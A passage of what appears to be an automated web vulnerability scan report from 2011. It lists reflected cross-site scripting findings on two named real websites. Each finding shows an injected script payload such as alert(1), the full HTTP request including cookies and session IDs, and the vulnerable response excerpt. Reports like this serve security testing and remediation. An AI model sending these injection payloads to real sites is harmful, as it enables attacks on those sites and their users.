           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1'
           RedirectTo = ''

   </script>
...[SNIP]...

3.127. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56417"><script>alert(1)</script>860ececfc88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web56417"><script>alert(1)</script>860ececfc88/home.nsf/articlesByTitle/Registration%20FAQ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:33 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19273
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web56417"><script>alert(1)</script>860ececfc88/home.nsf/articlesByTitle/Registration FAQ" name="RedirectTo" />
...[SNIP]...

3.128. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a676'%3b6fd80229fed was submitted in the REST URL parameter 1. This input was echoed as 2a676';6fd80229fed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web2a676'%3b6fd80229fed/home.nsf/articlesByTitle/Registration%20FAQ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19173
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
dbPath + '/switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web2a676';6fd80229fed/home.nsf/articlesbytitle/registration faq'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.129. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58dc7'%3b6483071eb3a was submitted in the REST URL parameter 3. This input was echoed as 58dc7';6483071eb3a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/home.nsf/articlesByTitle58dc7'%3b6483071eb3a/Registration%20FAQ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19208
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
nt&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/home.nsf/articlesbytitle58dc7';6483071eb3a/registration faq'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.130. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a234"><script>alert(1)</script>716d9e385a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/home.nsf/articlesByTitle3a234"><script>alert(1)</script>716d9e385a9/Registration%20FAQ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19333
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle3a234"><script>alert(1)</script>716d9e385a9/Registration FAQ" name="RedirectTo" />
...[SNIP]...

3.131. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 378dd'%3b08537c54579 was submitted in the REST URL parameter 4. This input was echoed as 378dd';08537c54579 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/home.nsf/articlesByTitle/Registration%20FAQ378dd'%3b08537c54579 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19259
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
No + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/home.nsf/articlesbytitle/registration faq378dd';08537c54579'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.132. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c3bc"><script>alert(1)</script>500a947cd28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/home.nsf/articlesByTitle/Registration%20FAQ5c3bc"><script>alert(1)</script>500a947cd28 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19255
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration FAQ5c3bc"><script>alert(1)</script>500a947cd28" name="RedirectTo" />
...[SNIP]...

3.133. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46048"><script>alert(1)</script>d598d4d4e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/home.nsf/articlesByTitle/Registration%20FAQ?46048"><script>alert(1)</script>d598d4d4e90=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:22 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19263
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration FAQ?46048"><script>alert(1)</script>d598d4d4e90=1" name="RedirectTo" />
...[SNIP]...

3.134. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/articlesByTitle/Registration%20FAQ

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77b9c'-alert(1)-'67ce31187c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/home.nsf/articlesByTitle/Registration%20FAQ?77b9c'-alert(1)-'67ce31187c1=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.2.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19207
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
o + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/home.nsf/articlesbytitle/registration faq?77b9c'-alert(1)-'67ce31187c1=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.135. http://content.usv.com/decor/javascript/magnify_pipeline.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /decor/javascript/magnify_pipeline.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97d0e"%3balert(1)//580d8e3af75 was submitted in the REST URL parameter 1. This input was echoed as 97d0e";alert(1)//580d8e3af75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /97d0e"%3balert(1)//580d8e3af75/javascript/magnify_pipeline.js?v1.3 HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://content.usv.com/pages/john-buttrick
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.4.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=fab9bae2efc0dc99e41c60993b9a93ac; path=/; expires=Thu, 06-Oct-2011 20:44:15 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31840
Date: Wed, 05 Oct 2011 20:44:15 GMT
X-Varnish: 1169897192
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
e="text/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/97d0e";alert(1)//580d8e3af75/javascript/magnify_pipeline.js";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("ht
...[SNIP]...

3.136. http://content.usv.com/decor/javascript/magnify_stats.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /decor/javascript/magnify_stats.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4b8d"%3balert(1)//4f4b1065f78 was submitted in the REST URL parameter 1. This input was echoed as b4b8d";alert(1)//4f4b1065f78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b4b8d"%3balert(1)//4f4b1065f78/javascript/magnify_stats.js?v1.2 HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://content.usv.com/pages/john-buttrick
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.4.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=114da01b737277febeae2f39ceb55562; path=/; expires=Thu, 06-Oct-2011 20:44:15 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31824
Date: Wed, 05 Oct 2011 20:44:15 GMT
X-Varnish: 1169897204
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
e="text/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/b4b8d";alert(1)//4f4b1065f78/javascript/magnify_stats.js";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https
...[SNIP]...

3.137. http://content.usv.com/decor/javascript/magnify_twitter_feed.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /decor/javascript/magnify_twitter_feed.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c120"%3balert(1)//e7fea9d0c8f was submitted in the REST URL parameter 1. This input was echoed as 6c120";alert(1)//e7fea9d0c8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6c120"%3balert(1)//e7fea9d0c8f/javascript/magnify_twitter_feed.js?v2 HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://content.usv.com/pages/bug-labs
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.1.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.5.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:46 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31850
Date: Wed, 05 Oct 2011 20:45:46 GMT
X-Varnish: 1169906903
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
e="text/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/6c120";alert(1)//e7fea9d0c8f/javascript/magnify_twitter_feed.js";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (
...[SNIP]...

3.138. http://content.usv.com/decor/track/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /decor/track/dot.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0bd6"%3balert(1)//aff4dbd7322 was submitted in the REST URL parameter 1. This input was echoed as f0bd6";alert(1)//aff4dbd7322 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f0bd6"%3balert(1)//aff4dbd7322/track/dot.gif?sp=enterprise&session_id=630c9a4e8c93f5b745a3b9c0be7ca014&rand=702812&site=P8TH6404Q1P6NBW1&time=1317847388 HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://content.usv.com/pages/john-buttrick
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.4.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:44:46 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31755
Date: Wed, 05 Oct 2011 20:44:46 GMT
X-Varnish: 1169900415
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


